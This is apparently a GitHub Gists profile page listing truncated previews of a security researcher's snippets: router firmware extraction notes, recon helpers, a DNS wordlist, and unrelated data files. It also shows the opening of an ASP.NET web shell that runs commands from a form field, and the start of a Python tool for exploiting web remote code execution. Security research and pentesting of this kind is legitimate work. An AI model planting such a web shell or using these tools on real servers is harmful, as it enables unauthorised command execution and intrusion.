破解完光猫不过隐,继续琢磨,查了些智能设备安全的教程,分析智能设备或嵌入式设备安全,第一步是要提取固件,所以接下来要提取固件了。
通过/proc虚拟文件系统读取MTD分区表:
/ # cat /proc/mtd
dev: size erasesize name
mtd0: 08000000 00020000 "whole flash"
mtd1: 00200000 00020000 "u-boot"
Malayke
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 发动机型号: 2.4升DOHC非涡轮增压发动机 | |
| 总长:4,265毫米(167.9英寸)ET 除外,4,280毫米(168.5英寸)适用于 ET | |
| 总宽:1,775毫米(69.9英寸) | |
| 整体高度(在C.W.):1,310毫米(51.6英寸) | |
| 轴距:2,575毫米(101.4英寸) | |
| 前轮距:1,520毫米(59.8英寸) | |
| 后轮距:1,550毫米(61.0英寸) | |
| 最小路面间隙:130毫米(5.1英寸) | |
| 发动机气缸排列:横置、水冷、四缸四冲程汽油发动机 | |
| 发动机气门系统机构:链条驱动、双顶置凸轮轴、4气门/缸 |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "technologies": { | |
| "1C-Bitrix": { | |
| "cats": [ | |
| "1", | |
| "6" | |
| ], | |
| "category_names": null, | |
| "cookies": { | |
| "BITRIX_SM_GUEST_ID": "", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import sys | |
| import signal | |
| from threading import Thread | |
| from http.server import HTTPServer, BaseHTTPRequestHandler | |
Malayke
/ parse_nmap_gnmap_to_httpx.py
Last active
April 10, 2023 09:00
parse/convert nmap grep output(gnmap) to projectdiscovery httpx target
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import sys | |
| if not sys.stdin.isatty(): | |
| stdin = sys.stdin.read().splitlines() | |
| gnmap = stdin | |
| elif len(sys.argv) > 1: | |
| target = sys.argv[1] | |
| with open(GNMAP) as f: |
Malayke
/ all.txt
Created
April 11, 2022 15:22
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Page Language="VB" Debug="true" %> | |
| <%@ import Namespace="system.IO" %> | |
| <%@ import Namespace="System.Diagnostics" %> | |
| <script runat="server"> | |
| Sub RunCmd(Src As Object, E As EventArgs) | |
| Dim myProcess As New Process() | |
| Dim myProcessStartInfo As New ProcessStartInfo(xpath.text) | |
| myProcessStartInfo.UseShellExecute = false |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| NOCOLOR='\033[0m' | |
| RED='\033[0;31m' | |
| GREEN='\033[0;32m' | |
| ORANGE='\033[0;33m' | |
| BLUE='\033[0;34m' | |
| PURPLE='\033[0;35m' | |
| CYAN='\033[0;36m' | |
| LIGHTGRAY='\033[0;37m' |
Malayke
/ named-pip-shell.py
Created
January 18, 2019 09:29
Make Web Remote Code Execution Vulnerabilities Great Again!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| from cmd import Cmd | |
| import requests | |
| import readline | |
| import sys | |
| from base64 import b64encode | |
| from random import randrange | |
| import threading | |
| from time import sleep |
Malayke
/ Mounting JFFS2 Images on a Linux PC.md
Last active
December 1, 2018 05:34
Linux 系统挂载 JFFS2 格式文件 http://wiki.emacinc.com/wiki/Mounting_JFFS2_Images_on_a_Linux_PC
Mounting JFFS2 Images on a Linux PC
It is possible to mount a binary JFFS2 image on a Linux PC without a flash device. This can be useful for examining the contents of the image, making required changes, and creating a new image in any format. When a JFFS2 image is copied directly from a JFFS2 flash partition, the resulting image is the size of the source partition, regardless of how much space is actually used for storage. Mounting the filesystem and using the mkfs.jffs2 utility to create a new image will result in a JFFS2 image without blank nodes. This can also be used to create multiple images for flashes with different characteristics, such as erase block sizes. This page describes two different methods of mounting JFFS2 images on a Linux PC.
This procedure requires that the following kernel modules are available or built-in to the kernel on the development machine: mtdram, mtdblock, jffs2, block2mtd, and loop.
One method of mounting JFFS2 images uses the mt
NewerOlder